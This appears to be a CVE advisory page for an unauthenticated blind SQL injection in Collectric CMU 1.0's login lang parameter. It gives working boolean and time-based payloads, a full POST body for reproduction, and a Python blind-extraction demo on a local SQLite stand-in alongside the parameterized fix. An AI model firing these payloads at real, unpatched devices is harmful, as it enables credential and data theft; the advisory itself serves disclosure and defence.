Collectric CMU 1.0 SQL Injection via lang Parameter
Description
Collectric CMU 1.0 contains a boolean-based blind SQL injection vulnerability in the lang parameter that allows unauthenticated attackers to manipulate database queries during authentication. Attackers can inject SQL code through the lang parameter in login requests to extract sensitive information from the database using time-based blind techniques.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Collectric CMU 1.0 is vulnerable to unauthenticated blind SQL injection via the `lang` parameter, allowing attackers to extract database information using time-based techniques.
Vulnerability
Collectric CMU 1.0 (and possibly all known versions per [1]) contains a boolean-based blind SQL injection vulnerability in the lang parameter of the login page. An unauthenticated attacker can inject SQL code through this parameter, which is submitted with the login form (the proof of concept in [1] sends it as POST form data), using payloads such as lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr. The weakness is classified as CWE-89 [2]. The web interface runs on an NGW board with Linux 2.6.30 and PHP [1].
Exploitation
No authentication is required; an attacker with network access to the Collectric CMU web interface can exploit the vulnerability by submitting the login form with a crafted lang parameter. Boolean-based blind techniques let the attacker infer database contents one true/false question at a time by comparing responses, and time-based payloads (e.g., AND SLEEP(5), which is MySQL-specific) confirm the injection point even when the response content does not visibly differ. No user interaction is needed beyond the request.
Impact
Successful exploitation enables an unauthenticated attacker to extract sensitive information from the underlying MySQL database. The CVSS v4 vector indicates high confidentiality impact and low integrity impact [2]. Depending on the database contents, this could include user credentials, device configuration, or other sensitive data. The discovered hard-coded credentials in the same source [1] suggest additional risk of lateral movement.
Mitigation
As of the publication date, no official patch or fixed version has been released by the vendor [1][2]. The vendor homepage is http://ourenergy.se/ [1]. Until a fix is available: restrict network access to the web interface, add web application firewall rules that block SQL injection patterns (a compensating control, not a fix, since the query itself still concatenates user input), and check the system for the hard-coded credentials reported in [1]. If the web portal is not required, disable it.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Collectric CMU, range <=1.0 (upper bound unconfirmed; the advisory [1] says possibly all known versions)
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the lang parameter allows SQL injection into database queries during authentication."
Attack vector
An unauthenticated attacker submits the login form with a crafted lang parameter (a POST request, per the proof of concept in [1]). The payload injects SQL into the WHERE or HAVING clause of the query that consumes lang, as demonstrated by the boolean-based blind payload `lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr` [1]. The attacker can also use time-based blind techniques, such as `lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV`, to extract sensitive information by observing response delays [1]. No authentication or special network position is required; the device's PHP admin interface is exposed over the network.
Affected code
The vulnerability exists in the login handling code of the Collectric CMU PHP admin interface, where the lang parameter of the login form is incorporated into a SQL query without sanitization or parameterization [1]. The exact file path is not disclosed in the advisory, but the parameter is processed when the login form is submitted, before any credentials are checked.
What the fix does
No patch is provided in the bundle. The advisory does not specify a fix; remediation would require either parameterizing the query that uses lang or validating lang against the fixed set of supported language names before it reaches SQL. Given the hard-coded credentials for the web portal, SSH, and MySQL reported in [1], the vendor should also rotate all default credentials and apply input validation to every user-controllable parameter.
Preconditions
- Network: The Collectric CMU device must be reachable over the network with its PHP admin interface exposed.
- Authentication: None required; the lang parameter is accepted on the login page before authentication.
Reproduction
1. Access the Collectric CMU login page on the device's web interface.
2. Submit the login form as a POST request with the following body to trigger the boolean-based blind injection: `username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in` [1]. The username and password values are arbitrary; the injection does not depend on valid credentials.
3. To confirm time-based blind injection, replace the lang value with `SWEDISH' AND SLEEP(5) AND 'kglV'='kglV` and observe a roughly 5-second delay in the response [1]. Changing the condition to one that is false (for example `1320=1321`) and observing a different response confirms the boolean oracle.
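The mechanics above, as an added worked example that is not part of the advisory or the vendor's code: a Python reconstruction of the flawed query pattern, using an in-memory SQLite database as a stand-in for the device's MySQL instance. The schema, the `languages` lookup, and the `admin` row are assumptions made for illustration; the advisory does not disclose the real query or file. The example shows the advisory's boolean payload flipping the query result, a blind character-by-character extraction loop built on that oracle, and the parameterized form of the same query, which the payload no longer affects. MySQL's `SLEEP()` has no SQLite equivalent, so the time-based variant is not exercised here.

```python
import sqlite3
import string

# Constructed stand-in schema (assumption: the advisory does not disclose
# the device's real tables). One language row and one user row suffice.
SCHEMA = """
CREATE TABLE languages (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
INSERT INTO languages (name) VALUES ('SWEDISH'), ('ENGLISH');
CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES ('admin', 's3cret');
"""


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lang_lookup_vulnerable(db, lang):
    """Hypothetical reconstruction of the flawed lookup: the submitted lang
    value is spliced into the SQL text, so a quote in the input closes the
    literal and everything after it is parsed as SQL. Returns True when the
    query finds a row, which is the only signal a blind attacker observes."""
    sql = "SELECT id FROM languages WHERE name = '" + lang + "'"
    return db.execute(sql).fetchone() is not None


def lang_lookup_fixed(db, lang):
    """Parameterized form of the same lookup: lang travels as a bound value,
    so the advisory's payload is compared as a literal and matches nothing."""
    row = db.execute("SELECT id FROM languages WHERE name = ?", (lang,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, alphabet=string.ascii_letters + string.digits,
                  max_len=32):
    """Boolean-based blind extraction over a True/False oracle. For each
    position, ask "is character N of <subquery> equal to c?" for every
    candidate until none matches, which marks the end of the value. The
    payload shape is the advisory's: value, closing quote, AND <condition>,
    AND 'EXAr'='EXAr (the application supplies the final quote).
    Note: SQLite compares TEXT case-sensitively; MySQL's default collations
    are case-insensitive, so a real extraction would wrap the compared
    value in BINARY to keep the alphabet meaningful."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "SUBSTR((%s),%d,1)='%s'" % (subquery, pos, ch)
            if oracle("SWEDISH' AND %s AND 'EXAr'='EXAr" % cond):
                found += ch
                break
        else:
            break  # no candidate matched: end of the value
    return found


if __name__ == "__main__":
    db = open_db()
    true_payload = "SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr"
    false_payload = "SWEDISH' AND 1320=1321 AND 'EXAr'='EXAr"
    print("vulnerable, true condition :", lang_lookup_vulnerable(db, true_payload))
    print("vulnerable, false condition:", lang_lookup_vulnerable(db, false_payload))
    print("fixed, same payload        :", lang_lookup_fixed(db, true_payload))
    secret = blind_extract(lambda p: lang_lookup_vulnerable(db, p),
                           "SELECT password FROM users WHERE username = 'admin'")
    print("extracted via boolean blind:", secret)
```

Run stand-alone, the vulnerable lookup answers True for the advisory's payload and False when the condition is changed to `1320=1321`, and the extraction loop recovers the sample `admin` password from nothing but those yes/no answers; the parameterized lookup answers False for the same payload because the whole string is treated as a language name. Against the real device, the oracle would be an HTTP POST of the login form with the response content (or, for the `SLEEP(5)` variant, the response time) standing in for the row-found flag.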
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- [1] www.exploit-db.com/exploits/45446 (exploit; source: MITRE)
- [2] www.vulncheck.com/advisories/collectric-cmu-sql-injection-via-lang-parameter (third-party advisory; source: MITRE)
- [3] ourenergy.se (product; source: MITRE)
News mentions
No linked articles in our index yet.